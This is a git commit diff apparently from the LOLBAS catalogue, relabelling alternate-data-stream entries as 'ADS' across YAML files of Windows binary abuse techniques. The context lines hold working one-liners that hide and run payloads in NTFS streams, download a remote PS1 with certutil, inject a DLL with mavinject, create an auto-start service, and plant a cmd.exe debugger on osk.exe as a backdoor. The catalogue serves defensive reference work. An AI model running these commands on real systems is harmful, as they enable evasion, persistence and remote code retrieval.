Changed alternate data stream to ADS as category

2024-12-26 14:59:03 +01:00 · 2018-09-26 09:34:01 +02:00 · 2018-09-26 09:34:01 +02:00 · d48273583e
commit d48273583e
parent 7961a99173
19 changed files with 28 additions and 25 deletions
--- a/Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1
+++ b/Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1
@ -3,7 +3,10 @@
 #Author: Oddvar Moe
 #If you can use it, be my guest!
-$mainpath = "C:\data\gitprojects\LOLBAS"
+# Install-Module powershell-yaml
 # import-module powershell-yaml
 $mainpath = "C:\LOLBAS"
 function Convert-YamlToMD
--- a/yml/OSBinaries/Bitsadmin.yml
+++ b/yml/OSBinaries/Bitsadmin.yml
@ -7,7 +7,7 @@ Commands:
  - Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
    Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.
    Usecase: Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique.
-    Category: Alternate data streams
+    Category: ADS
    Privileges: User
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
--- a/yml/OSBinaries/Certutil.yml
+++ b/yml/OSBinaries/Certutil.yml
@ -15,7 +15,7 @@ Commands:
  - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
    Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
    Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
-    Category: Alternate data streams
+    Category: ADS
    Privileges: User
    MitreID: T1105
    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
--- a/yml/OSBinaries/Control.yml
+++ b/yml/OSBinaries/Control.yml
@ -7,7 +7,7 @@ Commands:
  - Command: control.exe c:\windows\tasks\file.txt:evil.dll
    Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).
    Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
-    Category: Alternate data streams
+    Category: ADS
    Privileges: User
    MitreID: T1196
    MitreLink: https://attack.mitre.org/wiki/Technique/T1196
--- a/yml/OSBinaries/Cscript.yml
+++ b/yml/OSBinaries/Cscript.yml
@ -7,7 +7,7 @@ Commands:
  - Command: cscript c:\ads\file.txt:script.vbs
    Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
    Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
-    Category: Alternate data streams
+    Category: ADS
    Privileges: User
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
--- a/yml/OSBinaries/Esentutl.yml
+++ b/yml/OSBinaries/Esentutl.yml
@ -15,7 +15,7 @@ Commands:
  - Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
    Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.
    Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
-    Category: Alternate data streams
+    Category: ADS
    Privileges: User
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@ -23,7 +23,7 @@ Commands:
  - Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
    Description: Copies the source Alternate Data Stream (ADS) to the destination EXE.
    Usecase: Extract hidden file within alternate data streams
-    Category: Alternate data streams
+    Category: ADS
    Privileges: User
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@ -31,7 +31,7 @@ Commands:
  - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
    Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.  
    Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
-    Category: Alternate data streams
+    Category: ADS
    Privileges: User
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
--- a/yml/OSBinaries/Expand.yml
+++ b/yml/OSBinaries/Expand.yml
@ -23,7 +23,7 @@ Commands:
  - Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
    Description: Copies source file to destination Alternate Data Stream (ADS)
    Usecase: Copies files from A to B
-    Category: Alternate data streams
+    Category: ADS
    Privileges: User
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
--- a/yml/OSBinaries/Extrac32.yml
+++ b/yml/OSBinaries/Extrac32.yml
@ -7,7 +7,7 @@ Commands:
  - Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
    Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
    Usecase: Extract data from cab file and hide it in an alternate data stream. 
-    Category: Alternate data streams
+    Category: ADS
    Privileges: User
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@ -15,7 +15,7 @@ Commands:
  - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
    Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
    Usecase: Extract data from cab file and hide it in an alternate data stream. 
-    Category: Alternate data streams
+    Category: ADS
    Privileges: User
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
--- a/yml/OSBinaries/Findstr.yml
+++ b/yml/OSBinaries/Findstr.yml
@ -7,7 +7,7 @@ Commands:
  - Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
    Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
    Usecase: Add a file to an alternate data stream to hide from defensive counter measures
-    Category: Alternate data streams
+    Category: ADS
    Privileges: User
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@ -15,7 +15,7 @@ Commands:
  - Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
    Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
    Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures
-    Category: Alternate data streams
+    Category: ADS
    Privileges: User
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
--- a/yml/OSBinaries/Forfiles.yml
+++ b/yml/OSBinaries/Forfiles.yml
@ -15,7 +15,7 @@ Commands:
  - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
    Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.
    Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream
-    Category: Alternate data streams
+    Category: ADS
    Privileges: User
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
--- a/yml/OSBinaries/Makecab.yml
+++ b/yml/OSBinaries/Makecab.yml
@ -7,7 +7,7 @@ Commands:
  - Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
    Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
    Usecase: Hide data compressed into an alternate data stream
-    Category: Alternate data streams
+    Category: ADS
    Privileges: User
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
--- a/yml/OSBinaries/Mavinject.yml
+++ b/yml/OSBinaries/Mavinject.yml
@ -15,7 +15,7 @@ Commands:
  - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
    Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172
    Usecase: Inject dll file into running process
-    Category: Alternate data streams
+    Category: ADS
    Privileges: User
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
--- a/yml/OSBinaries/Mshta.yml
+++ b/yml/OSBinaries/Mshta.yml
@ -31,7 +31,7 @@ Commands:
  - Command: mshta.exe "C:\ads\file.txt:file.hta"
    Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
    Usecase: Execute code hidden in alternate data stream
-    Category: Alternate data streams
+    Category: ADS
    Privileges: User
    MitreID: T1170
    MitreLink: https://attack.mitre.org/wiki/Technique/T1170
--- a/yml/OSBinaries/Print.yml
+++ b/yml/OSBinaries/Print.yml
@ -7,7 +7,7 @@ Commands:
  - Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
    Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
    Usecase: Hide binary file in alternate data stream to potentially bypass defensive counter measures
-    Category: Alternate data streams
+    Category: ADS
    Privileges: User
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
--- a/yml/OSBinaries/Reg.yml
+++ b/yml/OSBinaries/Reg.yml
@ -7,7 +7,7 @@ Commands:
  - Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
    Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream.
    Usecase: Hide/plant registry information in Alternate data stream for later use
-    Category: Alternate data streams
+    Category: ADS
    Privileges: User
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
--- a/yml/OSBinaries/Regedit.yml
+++ b/yml/OSBinaries/Regedit.yml
@ -7,7 +7,7 @@ Commands:
  - Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
    Description: Export the target Registry key to the specified .REG file.
    Usecase: Hide registry data in alternate data stream
-    Category: Alternate data streams
+    Category: ADS
    Privileges: User
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@ -15,7 +15,7 @@ Commands:
  - Command: regedit C:\ads\file.txt:regfile.reg"
    Description: Import the target .REG file into the Registry.
    Usecase: Import hidden registry data from alternate data stream
-    Category: Alternate data streams
+    Category: ADS
    Privileges: User
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
--- a/yml/OSBinaries/Sc.yml
+++ b/yml/OSBinaries/Sc.yml
@ -7,7 +7,7 @@ Commands:
  - Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
    Description: Creates a new service and executes the file stored in the ADS.
    Usecase: Execute binary file hidden inside an alternate data stream
-    Category: Alternate data streams 
+    Category: ADS 
    Privileges: User
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
--- a/yml/OSBinaries/Wmic.yml
+++ b/yml/OSBinaries/Wmic.yml
@ -7,7 +7,7 @@ Commands:
  - Command: wmic.exe process call create "c:\ads\file.txt:program.exe"
    Description: Execute a .EXE file stored as an Alternate Data Stream (ADS)
    Usecase: Execute binary file hidden in Alternate data streams to evade defensive counter measures
-    Category: Alternate data streams
+    Category: ADS
    Privileges: User
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@ -20,7 +20,7 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-  - Command: 'wmic.exe /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"'
+  - Command: wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
    Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well.
    Usecase: Execute binary by manipulate the debugger for a program to evade defensive counter measures
    Category: Execute
--- a/yml/OSBinaries/Wscript.yml
+++ b/yml/OSBinaries/Wscript.yml
@ -7,7 +7,7 @@ Commands:
  - Command: wscript c:\ads\file.txt:script.vbs
    Description: Execute script stored in an alternate data stream
    Usecase: Execute hidden code to evade defensive counter measures
-    Category: Alternate data streams
+    Category: ADS
    Privileges: User
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096